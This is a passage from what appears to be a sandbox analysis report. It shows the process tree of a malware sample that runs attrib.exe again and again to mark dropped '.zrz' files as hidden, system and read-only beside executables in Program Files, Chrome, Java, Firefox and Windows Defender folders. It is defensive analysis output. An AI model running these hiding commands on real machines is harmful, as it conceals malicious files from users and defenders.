- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\DVD Maker\DVDMaker.zrz"
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iediagcmd.zrz"
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ieinstal.zrz"
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ielowutil.zrz"
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iexplore.zrz"
    3⤵
    PID:2284
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.zrz"
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.zrz"
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.zrz"
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\jabswitch.zrz"
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\java-rmi.zrz"
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\java.zrz"
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\javacpl.zrz"
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\javaw.zrz"
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\javaws.zrz"
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\jp2launcher.zrz"
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\keytool.zrz"
    3⤵
    PID:2068
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\kinit.zrz"
    3⤵
    PID:792
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\klist.zrz"
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\ktab.zrz"
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\orbd.zrz"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\pack200.zrz"
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\policytool.zrz"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\rmid.zrz"
    3⤵
    - Sets file to hidden
    PID:388
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\rmiregistry.zrz"
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\servertool.zrz"
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\tnameserv.zrz"
    3⤵
    PID:528
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\ssvagent.zrz"
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jre7\bin\unpack200.zrz"
    3⤵
    PID:2112
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Microsoft Games\Chess\Chess.zrz"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Microsoft Games\FreeCell\FreeCell.zrz"
    3⤵
    - Drops file in Program Files directory
    PID:1000
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Microsoft Games\Hearts\Hearts.zrz"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Microsoft Games\Mahjong\Mahjong.zrz"
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Microsoft Games\Minesweeper\MineSweeper.zrz"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Microsoft Games\Multiplayer\Backgammon\bckgzm.zrz"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Microsoft Games\Multiplayer\Checkers\chkrzm.zrz"
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Microsoft Games\Multiplayer\Spades\shvlzm.zrz"
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Microsoft Games\Purble Place\PurblePlace.zrz"
    3⤵
    - Drops file in Program Files directory
    PID:2488
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Microsoft Games\Solitaire\Solitaire.zrz"
    3⤵
    PID:2728
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaire.zrz"
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Microsoft Office\Office14\MSOHTMED.zrz"
    3⤵
    PID:2848
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Mozilla Firefox\uninstall\helper.zrz"
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Mozilla Firefox\crashreporter.zrz"
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Mozilla Firefox\default-browser-agent.zrz"
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Mozilla Firefox\firefox.zrz"
    3⤵
    - Drops file in Program Files directory
    PID:2704
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Mozilla Firefox\maintenanceservice.zrz"
    3⤵
    - Sets file to hidden
    PID:2252
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Mozilla Firefox\minidump-analyzer.zrz"
    3⤵
    - Sets file to hidden
    PID:968
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Mozilla Firefox\maintenanceservice_installer.zrz"
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Mozilla Firefox\pingsender.zrz"
    3⤵
    - Sets file to hidden
    PID:2308
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Mozilla Firefox\plugin-container.zrz"
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Mozilla Firefox\private_browsing.zrz"
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Mozilla Firefox\updater.zrz"
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\VideoLAN\VLC\uninstall.zrz"
    3⤵
    - Drops file in Program Files directory
    PID:2944
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\VideoLAN\VLC\vlc-cache-gen.zrz"
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\VideoLAN\VLC\vlc.zrz"
    3⤵
    - Sets file to hidden
    PID:1448
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MSASCui.zrz"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MpCmdRun.zrz"
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\Journal.zrz"
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\PDIALOG.zrz"
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wab.zrz"
    3⤵
    - Sets file to hidden
    PID:1056
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wabmig.zrz"
    3⤵
    PID:2620
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\WinMail.zrz"
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\setup_wm.zrz"
    3⤵
    PID:1320
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmlaunch.zrz"
    3⤵
    PID:1476
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpconfig.zrz"
    3⤵
    PID:368
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPDMC.zrz"
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpenc.zrz"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1276
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmplayer.zrz"
    3⤵
    PID:792
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnetwk.zrz"
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnscfg.zrz"
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmprph.zrz"
    3⤵
    PID:1416
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpshare.zrz"
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPSideShowGadget.zrz"
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows NT\Accessories\wordpad.zrz"
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Photo Viewer\ImagingDevices.zrz"
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Sidebar\sidebar.zrz"
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.zrz"
    3⤵
    - Views/modifies file attributes
    PID:672
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.zrz"
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.zrz"
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.zrz"
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.zrz"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.zrz"
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.zrz"
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.zrz"
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.zrz"
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.zrz"
    3⤵
    - Sets file to hidden
    PID:1708
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.zrz"
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\Adobe\Updater6\AdobeUpdaterInstallMgr.zrz"
    3⤵
    PID:2504
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\Adobe\Updater6\Adobe_Updater.zrz"
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Application Installer.zrz"
    3⤵
    - Views/modifies file attributes
    PID:2752
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Updater.zrz"
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\airappinstaller.zrz"
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\attrib.exe
    "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\template.zrz"
    3⤵
    PID:1688
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.zrz"
  2⤵
  PID:1356
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\setup.zrz"
  2⤵
  PID:2836
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\DW20.zrz"
  2⤵
  PID:2468
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\dwtrig20.zrz"
  2⤵
  PID:2824
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\7-Zip\7zFM.zrz"
  2⤵
  - Sets file to hidden
  PID:1340
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\7-Zip\7z.zrz"
  2⤵
  PID:1240
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\7-Zip\7zG.zrz"
  2⤵
  PID:2692
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\7-Zip\Uninstall.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:2760
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.zrz"
  2⤵
  PID:2056
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\FlickLearningWizard.zrz"
  2⤵
  PID:680
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InkWatson.zrz"
  2⤵
  PID:1172
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.zrz"
  2⤵
  PID:1436
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\mip.zrz"
  2⤵
  PID:1636
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.zrz"
  2⤵
  - Views/modifies file attributes
  PID:2672
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.zrz"
  2⤵
  PID:572
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.zrz"
  2⤵
  PID:2932
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.zrz"
  2⤵
  PID:2680
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.zrz"
  2⤵
  PID:2356
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.zrz"
  2⤵
  PID:3028
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\DVD Maker\DVDMaker.zrz"
  2⤵
  PID:2080
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.zrz"
  2⤵
  PID:2120
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.zrz"
  2⤵
  - Views/modifies file attributes
  PID:2536
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:2268
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:1720
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Google\Chrome\Application\106.0.5249.119\notification_helper.zrz"
  2⤵
  PID:2296
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Google\Chrome\Application\chrome.zrz"
  2⤵
  PID:2272
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Google\Chrome\Application\chrome_proxy.zrz"
  2⤵
  PID:2216
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iediagcmd.zrz"
  2⤵
  - Views/modifies file attributes
  PID:1716
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ieinstal.zrz"
  2⤵
  PID:2224
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ielowutil.zrz"
  2⤵
  PID:2000
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iexplore.zrz"
  2⤵
  PID:1808
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.zrz"
  2⤵
  PID:1084
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\apt.zrz"
  2⤵
  PID:396
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.zrz"
  2⤵
  PID:1528
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\idlj.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:2608
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.zrz"
  2⤵
  PID:1988
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jar.zrz"
  2⤵
  PID:1892
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:856
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.zrz"
  2⤵
  PID:1264
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\java.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:2392
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\javac.zrz"
  2⤵
  PID:2664
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\javadoc.zrz"
  2⤵
  PID:1000
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.zrz"
  2⤵
  PID:2596
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\javah.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:2528
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\javap.zrz"
  2⤵
  PID:2064
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\javaw.zrz"
  2⤵
  PID:1708
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\javaws.zrz"
  2⤵
  PID:2360
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.zrz"
  2⤵
  - Sets file to hidden
  PID:2100
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jconsole.zrz"
  2⤵
  PID:2668
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jdb.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:2800
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jhat.zrz"
  2⤵
  PID:2436
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jinfo.zrz"
  2⤵
  PID:3048
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jmap.zrz"
  2⤵
  PID:2952
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jmc.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:2700
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jps.zrz"
  2⤵
  PID:2704
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.zrz"
  2⤵
  PID:2828
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:2052
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jstack.zrz"
  2⤵
  PID:2736
- C:\Windows\SysWOW64\attrib.exe
